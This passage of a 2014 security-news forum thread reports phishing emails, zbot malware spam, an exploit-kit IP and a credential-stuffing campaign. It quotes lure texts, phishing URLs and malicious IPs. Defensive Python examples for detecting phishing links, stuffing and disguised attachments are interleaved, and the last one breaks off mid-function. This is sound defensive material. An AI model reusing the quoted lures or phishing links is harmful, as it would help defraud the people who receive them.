Aug 29 2014 - "... Microsoft GM of Windows Apps and Store Todd Brix said in a blog post*, "As Windows Store expands to reach more customers in more markets with a growing list of great titles, we are continuously looking for ways to improve both customer experience and developer opportunity. We strive to give our worldwide customer base easy access to amazing app experiences while keeping developer friction to a minimum. From time to time this process slips out of sync and we need to recalibrate". Brix admitted that Microsoft found that some customers weren't satisfied with the Windows Store and some of the apps they found there, but he described the problem as involving merely misleading app descriptions... After relating how Microsoft tackled identifying apps having "confusing or misleading titles", Brix said, "Most of the developers behind apps that are found to violate our policies have good intentions and agree to make the necessary changes when notified. Others have been less receptive, causing us to remove more than 1,500 apps as part of this review so far....", not forgetting to reassure customers that "as always we will gladly refund the cost of an app that is downloaded as a result of an erroneous title or description".
* http://blogs.windows...-windows-store/


Edited by AplusWebMaster, 31 August 2014 - 08:03 AM.



#1268 AplusWebMaster

Posted 01 September 2014 - 04:56 AM

FYI...

Tesco Phish ...
- http://myonlinesecur...wards-phishing/
1 Sep 2014 - "... email arrives saying 'Tesco Payback Rewards'... email arrives apparently from Tesco saying 'Tesco Payback Rewards' that offers you £150 for filling in a Tesco customer satisfaction survey... it is a -scam- and is a phishing -fraud- designed to steal your bank and credit card details. The email says something like this:
    Tesco Customer Satisfaction program selected you to take part in our quick survey.
    To earn your 150 £ reward, please click here and complete the form.


Screenshots:
- http://myonlinesecur...k-_rewards1.png

- http://myonlinesecur...k-_rewards2.png

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them... careful when unzipping them and make sure you have “show known file extensions” enabled, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
___

Fake Statement SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
1 Sep 2014 - "'Statement as at 01/09/2014' pretending to come from Cathy Rossi < C.Rossi@ tcreidelectrical .co.uk > is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... emails are not being sent from tcreidelectrical .co.uk or T C REID (ELECTRICAL) LTD. As far as we can determine they have not been hacked or their website or email system compromised... Email reads:

    Please find attached statement from T C REID (ELECTRICAL) LTD as at 01/09/2014.

1 September 2014 : D0110109.PDF.zip ( 274kb): Extracts to D0110109.PDF.exe
Current Virus total detections: 2/55* . This Statement as at 01/09/2014 is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1409570924/
___

O/S Market Share - August 2014 ...
- http://www.netmarket...=10&qpcustomd=0
Browser Market Share
- http://www.netmarket...d=0&qpcustomd=0
9/1/2014
___

China gives MS 20 days to provide explanation in anti-trust probe
- http://www.reuters.c...N0GW1FD20140901
Sep 1, 2014 - "A Chinese anti-trust regulator said on Monday it has given Microsoft 20 days to reply to queries on the compatibility of its Windows operating system and Office software suite amid a probe into the world's largest software company. The State Administration for Industry and Commerce (SAIC) questioned Microsoft Vice President David Chen and gave the company a deadline to make an explanation... Microsoft is one of at least 30 foreign companies that have come under scrutiny by China's anti-monopoly regulators as the government seeks to enforce its six-year old antitrust law. Critics say the law is being used to unfairly target overseas businesses, a charge the regulators deny. According to a state media report on Monday, Microsoft's use of verification codes also spurred complaints from Chinese companies. Their use "may have violated China's anti-monopoly law", the official Xinhua news agency said on Monday. Verification codes are typically used by software companies as an anti-piracy mechanism. They are provided with legitimate copies of software and can be entered to entitle customers to updates and support from the manufacturer. Microsoft has long suffered from piracy of its software within China. Former Chief Executive Steve Ballmer told employees in Beijing that the company made less revenue in China than it did in the Netherlands... SAIC also repeated that it suspected the company has not fully disclosed issues relating to the compatibility of the software and the operating system... Last month, a delegation from chipmaker Qualcomm, led by company President Derek Aberle, met officials at the National Development and Reform Commission (NDRC) as part of that regulator's investigation of the San Diego-based firm. NDRC said earlier this year that the U.S. chipmaker is suspected of overcharging and abusing its market position in wireless communication standards. 
Microsoft's Nadella is expected to make his first visit to China as chief executive later this month."


Edited by AplusWebMaster, 01 September 2014 - 09:44 AM.

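Both the Netflix phish (bogus domain netflix-ssl .net dressed up with a long, genuine-looking URL) and the Tesco survey phish above rely on the reader not reading the hostname properly, and the HMRC refund lure hid its destination behind an Ow.ly link. The following is an added example, not code from any of the quoted blogs, of the checks a mail filter or a cautious user can run on a link before trusting it: it reduces the host to its registrable domain, compares that against an assumed allowlist of domains each brand really uses (BRAND_DOMAINS is illustrative, not authoritative), flags brand names that only appear in the hostname or path of an unrelated domain, flags known shorteners, and flags bare IP addresses. The suffix table is a tiny stand-in for the Public Suffix List; a real deployment should load the full list.

```python
import ipaddress
from typing import List
from urllib.parse import urlsplit

# Assumed allowlist: registrable domains each brand actually uses (example values only).
BRAND_DOMAINS = {
    "netflix": {"netflix.com"},
    "tesco": {"tesco.com"},
    "hmrc": {"hmrc.gov.uk", "gov.uk"},
}
# Shorteners hide the real destination, so expand them before deciding anything.
SHORTENERS = {"ow.ly", "bit.ly", "goo.gl", "t.co", "tinyurl.com"}
# Minimal stand-in for the Public Suffix List (assumption: enough for the example).
MULTI_LABEL_SUFFIXES = {"co.uk", "gov.uk", "org.uk", "ac.uk", "com.au", "co.nz"}


def registrable_domain(host: str) -> str:
    """'www.hmrc.gov.uk' -> 'hmrc.gov.uk'; 'login.netflix-ssl.net' -> 'netflix-ssl.net'."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def assess_url(url: str) -> List[str]:
    """Reasons a link should be treated as a phishing lure; an empty list means nothing obvious."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if not host:
        return ["no hostname in URL"]
    if is_ip_literal(host):
        return [f"bare IP address {host} instead of a domain"]
    reasons: List[str] = []
    reg = registrable_domain(host)
    if reg in SHORTENERS:
        reasons.append(f"shortener {reg} hides the destination; expand it before trusting it")
    rest = (parts.path + "?" + parts.query).lower()
    for brand, allowed in BRAND_DOMAINS.items():
        if reg in allowed:
            continue  # the brand's own domain; a brand name in the path is expected there
        if brand in host:
            reasons.append(f"'{brand}' appears in hostname {host} but the registrable domain is {reg}")
        elif brand in rest:
            reasons.append(f"'{brand}' appears only in the path of unrelated host {host}")
    return reasons


if __name__ == "__main__":
    for link in ("https://www.netflix.com/Login",
                 "https://netflix-ssl.net/account/billing/update/login.php",
                 "http://ow.ly/abcd",
                 "http://example.org/tesco-rewards/survey.html"):
        print(link, "->", assess_url(link) or "ok")
```

The point the registrable-domain step makes is the one the Netflix write-up makes in prose: everything to the left of netflix-ssl .net is decoration, and the padlock only proves you are talking to whoever registered that name.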


#1269 AplusWebMaster

Posted 02 September 2014 - 05:56 AM

FYI...

Something evil on 95.163.121.188 (Sweet Orange EK)
- http://blog.dynamoo....1188-sweet.html
2 Sep 2014 - "95.163.121.188 is currently hosting the Sweet Orange Exploit Kit (hat tip*). The IP is allocated to Digital Networks CJSC (aka DINETHOSTING) that has featured on this blog many times before**...
(Long list of domains at the URL above.)
... The domains appear to be legitimate ones that have been hijacked in some way.
95.163.121.188 forms part of a large netblock of 95.163.64.0/18 - I have had -half- of this (95.163.64.0/19) blocked for several years which has stopped a great deal of badness, so I recommend that you -block- either the /19 or /18..."
* http://www.malware-t...8/29/index.html

** http://blog.dynamoo....el/DINETHOSTING
___

Fake 'Bonus' SPAM/SCAM ...
- http://myonlinesecur...automated-draw/
2 Sep 2014 - "email received that tells you that you have won £1000 in an automated draw and haven’t claimed it yet:

Attempting to contact <REDACTED>
    This is automated draw #23851
    Our system shows you have been awarded with £1000!
    According to our records, voucher wasn’t collected yet
    Please be informed that your voucher is still valid. You may claim your wininngs and use them without making any deposit.
    Confirm your email here to claim your £1000 voucher.
    Have fun !
    Lindsey Lane
    CRM Manager..
    * This offer is available to new players only.
    You have received this email because you have requested more information from BonusNews...


Clicking the button that says claim your reward (or any other of the buttons) gives you a file to run on your computer that installs some casino software that is detected by several anti-malware programs as unwanted*..."
* https://www.virustot...29f89/analysis/
___

Hacks behind biggest-ever Password Theft begin Attacks
- http://it.slashdot.o...t-begin-attacks
1 Sep 2014 - "Back in August, groups of Russian hackers assembled the biggest list of compromised login credentials ever seen: 1.2 billion accounts. Now, domain registrar Namecheap reports* the hackers have begun using the list to try and access accounts. 'Overnight, our intrusion detection systems alerted us to a much higher than normal load against our login systems. ... The group behind this is using the stored usernames and passwords to simulate a web browser login through -fake- browser software. This software simulates the actual login process a user would use if they are using Firefox/Safari/Chrome to access their Namecheap account. The hackers are going through their username/password list and trying each and every one to try and get into Namecheap user accounts'. They report that most login attempts are failing, but some are succeeding. -Now- is a good time to check that none of your important accounts share passwords."
* http://community.nam...internet-users/


Edited by AplusWebMaster, 02 September 2014 - 01:06 PM.

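Namecheap's account of the attack above is a textbook credential-stuffing pattern: one source, a scripted "browser", a long list of username/password pairs, mostly failures with the occasional success. The following is an added example (not Namecheap's detection code) of the logic an intrusion detection rule for that pattern needs: per source IP, in a sliding window, count distinct usernames and the failure ratio, and when both cross a threshold report the source together with the accounts that did log in successfully, since those are the ones to lock and reset. The log format, window and thresholds are assumptions for the example; the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Assumed login-audit line format for the example.
LOG_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)")

# Constructed sample: 203.0.113.5 cycles through ten different usernames in five seconds with
# one hit; 198.51.100.7 is one user mistyping a password; 192.0.2.44 is a normal login.
SAMPLE_LOG = """\
2014-09-01T03:12:00Z ip=203.0.113.5 user=alice result=FAIL
2014-09-01T03:12:01Z ip=203.0.113.5 user=bob result=FAIL
2014-09-01T03:12:01Z ip=203.0.113.5 user=carol result=FAIL
2014-09-01T03:12:02Z ip=203.0.113.5 user=dave result=OK
2014-09-01T03:12:02Z ip=203.0.113.5 user=erin result=FAIL
2014-09-01T03:12:03Z ip=203.0.113.5 user=frank result=FAIL
2014-09-01T03:12:03Z ip=203.0.113.5 user=grace result=FAIL
2014-09-01T03:12:04Z ip=203.0.113.5 user=heidi result=FAIL
2014-09-01T03:12:04Z ip=203.0.113.5 user=ivan result=FAIL
2014-09-01T03:12:05Z ip=203.0.113.5 user=judy result=FAIL
2014-09-01T03:15:00Z ip=198.51.100.7 user=mallory result=FAIL
2014-09-01T03:15:09Z ip=198.51.100.7 user=mallory result=FAIL
2014-09-01T03:15:20Z ip=198.51.100.7 user=mallory result=OK
2014-09-01T03:20:00Z ip=192.0.2.44 user=peggy result=OK
"""


def parse_log(text: str) -> List[dict]:
    """Parse audit lines into events; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
                       "ip": m["ip"], "user": m["user"], "ok": m["result"] == "OK"})
    return events


def detect_stuffing(events: List[dict], window: timedelta = timedelta(minutes=5),
                    min_users: int = 8, min_fail_ratio: float = 0.7) -> Dict[str, dict]:
    """Flag source IPs that try many distinct usernames with mostly failures inside one window.

    A single user failing repeatedly is a forgotten password, not stuffing, so the
    distinct-username count is the primary signal; the failure ratio keeps a shared NAT
    full of legitimate logins from tripping the rule.
    """
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)
    alerts: Dict[str, dict] = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        for start in range(len(evs)):
            bucket = [e for e in evs[start:] if e["ts"] - evs[start]["ts"] <= window]
            users = {e["user"] for e in bucket}
            failures = sum(1 for e in bucket if not e["ok"])
            if len(users) >= min_users and failures / len(bucket) >= min_fail_ratio:
                alerts[ip] = {"users": len(users), "attempts": len(bucket), "failures": failures,
                              "successes": sorted(e["user"] for e in bucket if e["ok"])}
                break  # one alert per source is enough; the successes list is the action item
    return alerts


if __name__ == "__main__":
    for ip, info in detect_stuffing(parse_log(SAMPLE_LOG)).items():
        print(ip, info)
```

The successes list is what matters operationally: those are accounts whose password was reused from another breach and should be reset and notified, which is also the advice at the end of the quoted post.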


#1270 AplusWebMaster

Posted 03 September 2014 - 05:36 AM

FYI...

Fake NDR SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
3 Sep 2014 - "'NDR Bill' pretending to come from Ebilling <Ebilling@ westlothian .gov.uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Non domestic rates bills normally come out in February or March each year, so using this email template in September will or should raise alarm bells immediately. This particular email, allegedly sent by a Scottish local council, should immediately alert a recipient in the rest of the UK that it is totally bogus:
Please find attached your Non Domestic Rates bill.
If your account is in credit you are due a refund unless you have any other debt due to the Council.
To allow your credit to be processed please confirm:
- If you want the credit transferred to another account you have with us. Please confirm the account details.
- If you want the credit refunded by cheque, please confirm who it should be sent to and the address.
Links to Non Domestic Rates information are detailed below.
Important Note: If you access these links using a mobile phone the network provider may charge for this service.
Yours sincerely Scott Reid Revenues Manager ...


3 September 2014: 00056468.pdf.zip ( 207 kb): Extracts to 00056468.pdf.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1409725854/

- http://blog.dynamoo....bill-email.html
3 Sep 2014 - "Sometimes spammers come up with weird approaches. This one is a bill from West Lothian Council in the UK.. well, actually it -isn't- a bill but it comes with a malicious attachment.
    From:     Ebilling [Ebilling@ westlothian .gov.uk]
    Date:     3 September 2014 09:20
    Subject:     NDR Bill
    Please find attached your Non Domestic Rates bill...


Attached is a file 00056468.pdf.zip which contains a malicious executable D0110109.PDF.exe (which has an icon to make it look like a PDF file). This has a low detection rate at VirusTotal of 4/55*... This second component has a VT detection rate of just 3/55**. The Anubis report shows an attempted phone home to 80.94.160.129 (National Academy of Sciences of Belarus) and 92.222.46.165 (OVH, France)
Recommended blocklist:
80.94.160.129
92.222.46.165
..."
(More at the dynamoo URL above.)
* https://www.virustot...sis/1409733696/

** https://www.virustot...sis/1409734574/
___

“YouTube Account Manager has sent you a Message…”
- https://blog.malware...-you-a-message/
Sep 3, 2014 - "We’ve seen some complaints of a message sent to YouTube users via the YouTube messaging system, warning of account suspension:

    YouTube account manager has sent you a message
    We’d like to inform you that due to repeated or severe violations of our community guidelines and your YouTube account will be suspended 3 days from the time of this message. After careful review we determined that activity in your account violated our community guidelines, which prohibit spam, scams or commercially deceptive content. Please be aware that you are prohibited from accessing, possessing or creating any other YouTube accounts.
    Please follow the following instructions to recover your account:
    1. Please contact your account manager here: [url]
    2. You have to complete a quick survey to make sure you are human.
    3. Wait for our email explaining the next steps.
    * If you decide to ignore this message and not follow the above steps your account will be suspended.


This is what you would see after hitting the supplied link in the message:
“Complete a survey to verify your account”
> http://blog.malwareb...untmanager1.jpg
This one is a survey scam, and whoever is sending these messages is looking to make a little cash along with the panic they’re no doubt whipping up in YouTube users right about now. The links displayed on the left hand side are regional and will take clickers to various offers / surveys / signups and downloads. If you’re in any doubt as to the status of your YouTube account, you’d be better served contacting them directly than being tricked by these false messages currently in circulation. Scammers will often use similar tactics to send phishing links and malware, so in some ways recipients of this missive are getting the best of a bad deal – it’s “only” surveys and forms to fill in, along with the occasional download. However, that doesn’t mean we should rush to jump through their survey sign-up hoops either. Steer clear of this one, and keep on making those videos."
___

Fake 'Internet free' email SCAM - malware attachment
- http://myonlinesecur...ke-pdf-malware/
3 Sep 2014 - "'Transaction via the Internet free of charge, ID:I613410_745' pretending to come from Santander BillPay is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer... The -scammers-, malware purveyors and phishers do get more creative every day and this email is quite creative, with a link to report suspicious emails to Santander and genuine links to Visa, MasterCard and VeriSign in their efforts to persuade you that it is a genuine email and that you should open the attachment:
Dear <removed>,
Our system detectet that you have made a bill payment using our cloud-based BillPay processing website.
You can find all details regarding the transaction in attachment.
Important information on recent fake email activity
A number of UK banks have recently been targeted by fraudsters using emails to ask customers to enter their security details into a fake website.
At Santander Corporate Banking we will never send you an email that asks you to verify your security details or link to Internet banking. If you receive an email claiming to be from Santander Corporate Banking that you are suspicious about, please forward it to phishing@ santander .co.uk
If you are worried that someone may already have your personal security details, then please contact us on 0151 966 2105. Calls are recorded and may be monitored for security, quality control and training purposes...


3 September 2014 : I613410_745.zip ( 57kb): Extracts to Bill_Payment_2E_832e458.pdf.exe
Current Virus total detections: 1/54* ... This 'Transaction via the Internet free of charge, ID:I613410_745' is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1409750135/
___

Fake attached CBE form SPAM - PDF malware
- http://myonlinesecur...rm-pdf-malware/
3 Sep 2014 - "'Please review the attached CBE form' pretending to come from Jonathan.Bledsoe@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email contains a genuine PDF file that is malformed and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader...
     Importat message, read right away.
    Please review the attached CBE form, If you require changes to the options shown, please contact me right away so that we may address your concerns. We will record your elections in our system and provide you a final Client Confirmation Statement for your review.
    Please sign and send it back.
    Regards,
    ADP TotalSource Benefits Team


3 September 2014 : cbe_form.pdf - Current Virus total detections: 8/54*
... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustot...sis/1409761379/
___

Fake 'August report' SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
3 Sep 2014 - "'August Report' pretending to come from Jackie Cantrell <Jackie.Cantrell@ bankmanager .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
    Hello , Please find attached documents for last month. Please could you sign the BACs form and return it as your approval that I am to go ahead with the transmission. Kind regards Jackie Payroll Manager

This email attachment has 2 files inside it. Both are identical although have different names, so the bad guys get 2 bites at the cherry.
3 September 2014: BACs_Documents.zip ( 20 kb): Extracts to   BACs_Documents.scr
and to Case_090314.scr . Current Virus total detections: 12/55* . This August Report is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1409724912/
___

Fake Sky .com SPAM ...
- http://blog.dynamoo....spam-again.html
3 Sep 2014 - "These fake Sky emails are pretty common and have a malicious attachment:
    Date:      Wed, 3 Sep 2014 09:17:22 +0200 [03:17:22 EDT]
    From:      "Sky.com" [statement@ sky .com]
    Subject:      Statement of account
    Afternoon,
    Please find attached the statement of account.
    We look forward to receiving payment for August, invoice as this is now due for payment.
    Regards,
    Clark ...


The attachment is Statement.zip which contains a malicious executable Statement.scr which has a reasonable VirusTotal detection rate of 18/55*. The Anubis report indicates that the binary phones home..."
* https://www.virustot...sis/1409736793/
___

Fake 'Important Documents' email SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
3 Sep 2014 - "'RE: Important Documents' pretending to come from Simon Leiman <Simon.Leiman@ rbs .com> (the name of the sender at RBS appears to be random and can be any name) is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... No attachment in the email, but a link to a compromised website to download the malware:
RE: Important Documents
    [RBS Logo Image]
    Building tomorrow
    RE: Important Information
    We’re letting you know we have received a request from your bank to complete and sign the attached documents.
    To view/download the documents please click here.
    Please fill out the documents and fax them at +44 131 242 0017
    Simon Leiman
    Senior Accounting Manager
    Tel. +44 131 242 0017
    Email: Simon.Leiman@ rbs .com
    © Royal Bank of Scotland 2014 ...


3 September 2014: AccountDocuments.zip ( 12kb) : Extracts to AccountDocuments.scr
Current Virus total detections: 4/54* . This 'RE: Important Documents' is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...c0822/analysis/
___

iCloud hack/leak now being used as Social Engineering lure
- http://blog.trendmic...gineering-lure/
Sep 3, 2014 - "...  it was certainly only a matter of time before some enterprising cybercriminal decided that things were ripe for leveraging with socially-engineered threats. And that’s just what happened, as our scanning brought to our attention some freshly-concocted schemes targeting those looking for the photos borne from the aforementioned leak. The first threat we found hails from Twitter, in the form of a tweet being posted with hashtags that contain the name of one of the leak’s -victims- Jennifer Lawrence. The tweet sports a shortened link that, if -clicked- leads the user to a website offering a video of the actress in question...
Tweet with malicious link:
> http://blog.trendmic...wrencetweet.png
Website with offered video:
> http://blog.trendmic...encewebsite.png
If the user goes on to engage the playback, they are instead redirected to a download page for a ‘video converter’. The downloaded file is detected as ADW_BRANTALL:
> http://blog.trendmic...eoconverter.png
Besides this bait-and-switch maneuver, this particular threat also spread itself on Facebook by forcing users to share the malicious site on their profiles before they are given the ability to ‘play’ the offered video. This would result in the user’s wall being spammed with the link, as well as the download of another variant of ADW_BRANTALL. The spamming is shown below.
> http://blog.trendmic...acebookwall.png
Of course, in both cases, the user does not get to watch any video at all. And from our analysis, it appears that the majority of the users affected by this are from the United States (70%). We also discovered several malicious files floating around the internet that have been relabeled as zipped archives and/or video files of the leaked pictures in question. Again, we believe these files are part of a cybercriminal scheme to target those looking for the pictures themselves... With this incident in mind, it’s a good time to remind users that all popular news events – the iCloud leak being a prime example of it – will always have cybercriminals taking advantage of it in one way or another. If it’s something that you’ll use a search engine for, there’s a good chance that they’ve already created threats for it that will jump on you the moment you go looking. And do note that the threats we’ve talked about above are not the only ones lying around in wait! Always get your online news from trusted websites, and refrain from looking for/and downloading illegal material (such as leaked private photos or cracked software). Look into installing a security solution as well, if you haven’t done so already in these turbulent times. A few fleeting moments of convenience or enjoyment is never worth the hassle."
___

'Infrastructure-configuration' adjustment
- http://www.reuters.c...N0GY2EQ20140903
Sep 3, 2014 - "Facebook Inc went down briefly for an unknown number of U.S. users on Wednesday afternoon in what appeared to be the latest outage to affect the world's largest social network. Several users had earlier reported getting an error message, "unable to connect to the Internet" when attempting to sign in. Facebook said the log-in problems arose after what it called an infrastructure-configuration adjustment..."


Edited by AplusWebMaster, 03 September 2014 - 09:09 PM.

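Nearly every zbot lure quoted in this post and the two before it (photo.zip extracting to photo.exe, D0110109.PDF.zip to D0110109.PDF.exe, 00056468.pdf.zip to 00056468.pdf.exe, BACs_Documents.zip with two .scr files, Statement.zip with Statement.scr) uses the same trick: an executable with a PDF icon and a document-looking name, at a point where VirusTotal detection is 1 to 4 out of 55. Signature detection is therefore the wrong control; the structural check below is an added example (not from myonlinesecurity or dynamoo) of what a mail gateway can do instead: open the zip attachment, flag members whose final extension is executable, flag the decoy double-extension pattern (.pdf.exe, .PDF.zip-then-.exe), flag nested archives, and look at the first bytes so that an .exe renamed to anything else is still caught by its MZ header. The attachment is constructed in memory to mirror the names in the post; the extension lists are the example's own assumptions.

```python
import io
import zipfile
from typing import Dict, List

# Extensions Windows will execute or script, and document extensions used as decoys
# in front of them (both lists are assumptions for the example, extend to taste).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
                   ".vbs", ".vbe", ".wsf", ".hta", ".jar", ".msi", ".cpl"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".jpeg", ".png",
                 ".txt", ".htm", ".html"}


def classify_name(name: str) -> List[str]:
    """Reasons an archive member name is suspicious, or [] if the name looks harmless."""
    reasons: List[str] = []
    base = name.lower().rsplit("/", 1)[-1]
    parts = base.split(".")
    if len(parts) < 2:
        return reasons
    exts = ["." + p for p in parts[1:]]
    last = exts[-1]
    if last in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {last}")
        if any(e in DOCUMENT_EXTS for e in exts[:-1]):
            reasons.append("document extension used as a decoy before the real one")
    if last == ".zip":
        reasons.append("nested archive")
    return reasons


def inspect_zip(data: bytes) -> Dict[str, List[str]]:
    """Map each member of a zip attachment to its suspicious traits; clean members are omitted.

    The name checks catch the double-extension lure; the MZ check catches an executable
    whose name has been changed to something innocuous, which the name checks would miss.
    """
    findings: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify_name(info.filename)
            with zf.open(info) as fh:
                head = fh.read(2)
            if head == b"MZ":  # DOS/PE header: a Windows executable whatever the name says
                reasons.append("content starts with MZ header")
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_zip() -> bytes:
    """Constructed attachment: a decoy-named .exe, a .scr, and one real (harmless) PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("D0110109.PDF.exe", b"MZ\x90\x00" + b"\x00" * 60)
        zf.writestr("Statement.scr", b"MZ\x90\x00" + b"\x00" * 60)
        zf.writestr("report.pdf", b"%PDF-1.4\n%%EOF\n")
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in inspect_zip(build_sample_zip()).items():
        print(member, "->", "; ".join(why))
```

With "show known file extensions" enabled, a human sees what classify_name sees; the MZ check is the part a human cannot do from Explorer, and it is the one that still works when the crooks switch to a new decoy extension.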


#1271 AplusWebMaster

Posted 04 September 2014 - 07:08 AM

FYI...

Fake sage .co.uk "Invoice_7104304" SPAM - PDF malware
- http://blog.dynamoo....04304-spam.html
4 Sep 2014 - "This -fake- invoice from Sage is actually a malicious PDF file:
    From:     Margarita.Crowe@ sage .co.uk [Margarita.Crowe@ sage .co.uk]
    Date:     23 July 2014 10:31
    Subject:     FW: Invoice_7104304
    Please see attached copy of the original invoice (Invoice_7104304).


Attached is a file sage_invoice_3074381_09042014.pdf which is -identical- to the payload for this Companies House spam* ..."
* http://blog.dynamoo....ual-return.html
4 Sep 2014 - "This -fake- Companies House spam comes with a malicious attachment.

Screenshot: https://4.bp.blogspo...ies-house-5.png

Attached is a malicious PDF file ar01_456746_09042014.pdf which has a VirusTotal detection rate of 5/54**. The Malware Tracker report shows that this attempts to exploit the CVE-2013-2729 flaw that was patched over a year ago.."
** https://www.virustot...58a2a/analysis/

- http://myonlinesecur...70-pdf-malware/
4 Sept 2014: sage_invoice_3074381_09042014.pdf - Current Virus total detections: 4/55***
*** https://www.virustot...sis/1409823534/
___

Fake 'Unauthorised iTunes Purchase' email - PHISH
- http://myonlinesecur...tunes-purchase/
4 Sep 2014 - "email received that says 'Unauthorised iTunes Purchase'. The interesting point about this one is the phishing URL. It is a pass through from a genuine Google URL https ://www.google .com/url?gc=PAH96di-ZUnHVlY&q=%68%74tp%3a%2f%2Fdl6.c1l%2eus%2FSb7ouez&sa=D&usg=AFQjCNEQ84I8qa2xYHVEKwXmJMrXG0_GhA which bounces via another url http ://dl6.c1l .us/Sb7ouez to end up on http ://111.90.144.179 /datacare/login/auth/dc347f94af30dff3ce1efd53f335d0e7/low_aa/
I had no idea that you could use google, especially a HTTPS (secure site) link to pass through to a phishing or any other site. Almost anybody seeing a google link will think that it is safe. Obviously this is a big security risk that Google servers allow this sort of divert or pass through and it needs to be plugged. The site asks for your Apple ID and password, then sends you to a page saying:
    My Apple ID
    It looks like someone used your data to make unverified purchase.
    We need to be sure that you’re real holder of this account and match the information you will provide us now with the information in our databases. Please make sure your information is correct before submitting it to us or it may cause further delays.
    Thank you.


Then wants you to fill in the form to give them your Name, address, Date of Birth, Credit card details, Mobile phone number etc. Everything they need to take over your identity in the virtual world as well as clear out all your bank and credit card accounts. It will then bounce you to the correct Apple page..."

111.90.144.179: https://www.virustot...79/information/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 04 September 2014 - 10:32 AM.

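The iTunes phish above hides its real destination inside a google.com/url?q=... link whose q= value is percent-encoded. The following is an added example, not code from the post or from myonlinesecurity: a small helper a mail filter or analyst can use to pull the true destination out of such a redirector link and compare it with the domain the link appears to lead to. The redirector host list is an assumption for the example; only the first hop (the encoded parameter) can be resolved offline, and the further bounce via dl6.c1l.us described in the post would need an actual fetch.

```python
"""Decode a search-engine redirector link from a phishing email.

Added example (not from the original post). The sample link is the one
quoted in the post, with the spaces the forum inserted to defang it
removed. No network access is performed.
"""
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Hosts whose /url endpoint forwards the browser to the address in their
# "q" parameter (assumption for this example; extend as needed).
REDIRECTOR_HOSTS = {"www.google.com", "google.com"}

SAMPLE_LINK = (
    "https://www.google.com/url?gc=PAH96di-ZUnHVlY"
    "&q=%68%74tp%3a%2f%2Fdl6.c1l%2eus%2FSb7ouez&sa=D"
    "&usg=AFQjCNEQ84I8qa2xYHVEKwXmJMrXG0_GhA"
)


def extract_redirect_target(link: str) -> Optional[str]:
    """Return the decoded destination of a redirector link, or None.

    None means the link is not a known redirector, or its "q" value is a
    plain search query rather than a URL.
    """
    parts = urlsplit(link)
    if parts.hostname not in REDIRECTOR_HOSTS or parts.path != "/url":
        return None
    q_values = parse_qs(parts.query).get("q")
    if not q_values:
        return None
    # parse_qs already percent-decoded once; decode again so a
    # double-encoded destination does not slip past a naive filter.
    target = unquote(q_values[0])
    if urlsplit(target).scheme not in ("http", "https"):
        return None
    return target


def describe_link(link: str) -> dict:
    """Summarise where a link really leads, for a mail-filter verdict.

    "visible_host" is the domain a reader sees when hovering the link;
    "final_host" is the domain the browser will actually be sent to.
    """
    visible_host = urlsplit(link).hostname
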